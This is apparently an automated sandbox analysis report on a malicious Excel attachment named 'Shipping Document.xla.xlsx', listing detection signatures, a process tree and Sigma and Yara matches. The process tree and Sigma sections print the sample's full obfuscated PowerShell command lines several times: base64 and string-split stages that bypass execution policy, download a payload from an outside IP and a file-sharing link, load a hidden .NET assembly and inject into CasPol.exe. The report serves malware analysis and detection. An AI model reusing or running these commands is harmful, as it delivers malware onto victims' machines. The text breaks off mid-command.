Edit tour

Windows Analysis Report
Shipping Document.xla.xlsx

Overview

General Information

Sample name:	Shipping Document.xla.xlsx
Analysis ID:	1563179
MD5:	54649fa2a8306383f72c8d8299a40998
SHA1:	873a48d89b2a2110c2edd79792fc1bdb13105d8d
SHA256:	ed2615dc3a9adfa6b3c4f5257f9497349f0fcca5d17e9c94622bf7af4db68a3b
Tags:	xlsxuser-lowmal3
Infos:

Detection

HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected HtmlPhish44

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Installs new ROOT certificates

Machine Learning detection for sample

Microsoft Office drops suspicious files

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3344 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3648 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 3784 cmdline: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 3884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3988 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 1808 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 2460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

CasPol.exe (PID: 2168 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

CasPol.exe (PID: 2644 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

CasPol.exe (PID: 2572 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

CasPol.exe (PID: 3176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

CasPol.exe (PID: 1776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 2460	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x16566:$b2: ::FromBase64String( 0x16fe6:$b2: ::FromBase64String( 0x181d3:$b2: ::FromBase64String( 0x18908:$b2: ::FromBase64String( 0x19184:$b2: ::FromBase64String( 0x19870:$b2: ::FromBase64String( 0x933e4:$b2: ::FromBase64String( 0x93c28:$b2: ::FromBase64String( 0x162f6:$b3: ::UTF8.GetString( 0x16d76:$b3: ::UTF8.GetString( 0x17f63:$b3: ::UTF8.GetString( 0x18698:$b3: ::UTF8.GetString( 0x18f14:$b3: ::UTF8.GetString( 0x19600:$b3: ::UTF8.GetString( 0x4913c:$b3: ::UTF8.GetString( 0x4ab9f:$b3: ::UTF8.GetString( 0x4b52a:$b3: ::UTF8.GetString( 0x4cc29:$b3: ::UTF8.GetString( 0x4ef35:$b3: ::UTF8.GetString( 0x4fa19:$b3: ::UTF8.GetString( 0x50833:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 924	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 924	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x57d3:$b2: ::FromBase64String( 0x5e41:$b2: ::FromBase64String( 0x1d3cc:$b2: ::FromBase64String( 0x1dc16:$b2: ::FromBase64String( 0x1f157:$b2: ::FromBase64String( 0x1f838:$b2: ::FromBase64String( 0x43d9a:$b2: ::FromBase64String( 0x4447c:$b2: ::FromBase64String( 0x4b861:$b2: ::FromBase64String( 0x4c769:$b2: ::FromBase64String( 0x4def4:$b2: ::FromBase64String( 0x6a88c:$b2: ::FromBase64String( 0xbc613:$b2: ::FromBase64String( 0xc587d:$b2: ::FromBase64String( 0xc8215:$b2: ::FromBase64String( 0xc88ee:$b2: ::FromBase64String( 0x5563:$b3: ::UTF8.GetString( 0x5bd1:$b3: ::UTF8.GetString( 0x1d15c:$b3: ::UTF8.GetString( 0x1d9a6:$b3: ::UTF8.GetString( 0x1eee7:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3du

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

Author: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = 